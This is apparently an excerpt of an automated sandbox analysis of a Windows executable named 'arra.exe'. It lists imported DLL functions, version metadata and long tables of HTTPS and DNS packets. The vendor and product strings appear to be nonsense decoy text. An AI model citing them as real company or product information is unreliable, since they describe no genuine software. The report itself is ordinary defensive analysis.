gdiplus.dll	GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipCloneImage, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown, GdipDisposeImage
ADVAPI32.dll	RegDeleteValueW, RegCreateKeyExW, RegDeleteKeyW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegEnumKeyExW, RegCloseKey
MSIMG32.dll	TransparentBlt, AlphaBlend

Version Infos

Description	Data
LegalCopyright	Column tell Corporation. All rights reserved.
InternalName	arra.exe
FileVersion	10.7.14.75 built by: 39959
CompanyName	Column tell Corporation
ProductName	Column tell Column tell 2014
ProductVersion	10.7.14.75
FileDescription	Column tell Nine in
OriginalFilename	arra.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2021 04:05:17.927963018 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:17.968168020 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:17.968981028 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:17.971504927 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.011701107 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.012576103 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.012602091 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.012618065 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.012722015 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.022810936 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.062938929 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.063695908 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.069999933 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.110133886 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.223429918 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.226116896 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.266465902 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385466099 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385489941 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385500908 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385516882 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385529995 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385548115 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385560989 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385569096 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385586023 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385592937 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.385724068 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.425858021 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425884962 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425900936 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425925016 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425942898 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425960064 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425976992 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.425988913 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.425993919 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426012993 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426023006 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426028967 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426043987 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426050901 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426063061 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426080942 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426083088 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426096916 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426112890 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426115990 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426127911 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426145077 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426147938 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426160097 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426176071 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426178932 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426197052 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.426203966 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.426253080 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466248035 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466281891 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466303110 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466329098 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466351986 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466372967 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466384888 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466394901 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466417074 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466428041 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466438055 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466454983 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466459990 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466480970 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466507912 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466509104 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466531038 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466551065 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466573000 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466593981 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466614008 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466640949 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466643095 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466662884 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466682911 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466687918 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466710091 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466730118 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466734886 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466751099 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466772079 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466778994 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466790915 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466815948 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466835022 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466839075 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466861010 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466885090 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466886044 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466905117 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466912985 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466926098 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466944933 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.466945887 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466967106 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.466988087 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467009068 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467009068 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.467034101 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467046022 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.467056036 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467070103 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.467076063 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467096090 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467116117 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.467118979 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.467217922 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.507314920 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507361889 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507397890 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507436037 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507467985 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.507482052 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507508039 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.507524014 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507561922 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507616043 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507656097 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507693052 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507725954 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.507730007 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.507761002 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.507766008 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.508294106 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.569170952 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.609488964 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716439962 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716532946 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716595888 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716639996 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716665983 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.716692924 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.716701031 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716762066 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716820002 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716880083 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716937065 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.716957092 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.716993093 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717051029 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717113018 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717160940 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717206001 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717262030 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717276096 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.717309952 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717370033 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717506886 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717550039 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.717570066 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717588902 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.717632055 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717684984 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717725992 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717763901 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717804909 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717827082 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.717864037 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717909098 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717961073 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.717968941 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.718015909 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718064070 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718106985 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718143940 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718182087 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718206882 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.718236923 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718280077 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718318939 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718355894 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718404055 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718417883 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.718461990 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718499899 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718535900 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718554974 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.718591928 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718631983 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718671083 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718705893 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718751907 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718770027 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.718810081 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718848944 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718898058 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718936920 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.718967915 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.718990088 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.719129086 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.759136915 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813514948 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813584089 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813628912 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813666105 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813707113 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813741922 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.813745022 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813781977 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813797951 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.813822031 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813847065 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.813859940 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813909054 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813944101 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.813956022 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.813996077 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814028025 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814065933 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814102888 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814131975 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814142942 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814171076 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814181089 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814229012 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814270020 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814307928 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814356089 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814362049 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814397097 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814398050 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814433098 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814471006 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814508915 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814536095 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814573050 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814591885 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814610004 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814620018 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814656973 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814698935 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814735889 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814774990 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814814091 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814826965 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814851046 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814863920 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.814888000 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814929962 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.814976931 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815018892 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815046072 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815072060 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.815084934 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815103054 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.815123081 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815159082 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815196991 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815233946 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815279961 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815321922 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815336943 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.815360069 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815397978 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815434933 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815470934 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815500975 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.815535069 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.815570116 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.855600119 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.855632067 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.855653048 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.855675936 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.855705976 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.855752945 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856059074 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856085062 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856103897 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856148958 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856169939 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856172085 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856192112 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856213093 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856225014 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856235981 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856256008 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856261969 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856276035 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856283903 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856296062 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856319904 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856319904 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856340885 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856360912 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856381893 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856384039 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856403112 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856420994 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856421947 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856443882 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856446028 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856463909 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856486082 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856487036 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856508970 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856528044 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856548071 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856548071 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856569052 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856587887 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856594086 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856607914 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856618881 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856626987 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856647968 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856657028 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856669903 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856688023 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856697083 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856708050 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856726885 CET	49761	443	192.168.2.3	104.244.42.131
Jan 14, 2021 04:05:18.856728077 CET	443	49761	104.244.42.131	192.168.2.3
Jan 14, 2021 04:05:18.856775999 CET	49761	443	192.168.2.3	104.244.42.131

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2021 04:02:42.073015928 CET	60100	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:42.132333994 CET	53	60100	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:43.212511063 CET	53195	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:43.268817902 CET	53	53195	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:44.586344004 CET	50141	53	192.168.2.3	8.8.8.8
